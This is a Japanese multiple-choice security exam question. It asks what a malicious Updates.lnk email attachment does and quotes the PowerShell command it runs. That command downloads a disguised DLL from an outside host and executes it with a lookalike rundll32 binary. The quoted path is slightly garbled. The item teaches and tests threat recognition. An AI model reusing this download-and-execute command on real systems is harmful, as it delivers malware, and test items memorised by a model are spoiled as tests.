ある従業員が、Updates.lnkという異常なファイルが添付された電子メールを受信した。セキュリティアナリストは、このファイルが何を行うかをリバースエンジニアリングしており、このファイルが次のスクリプトを実行することを発見しました:C:˶WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process rundl132.exe $env:TEMPautoupdate.dllアナリストが発見したことを最もよく説明しているのはどれですか?
A. PowerShellコードがDLLインジェクションを実行している。
B. PowerShellコードが画像を表示している。
C. PowerShellコードが環境変数を設定している。
D. PowerShellコードがWindows Updateの設定を変更しています。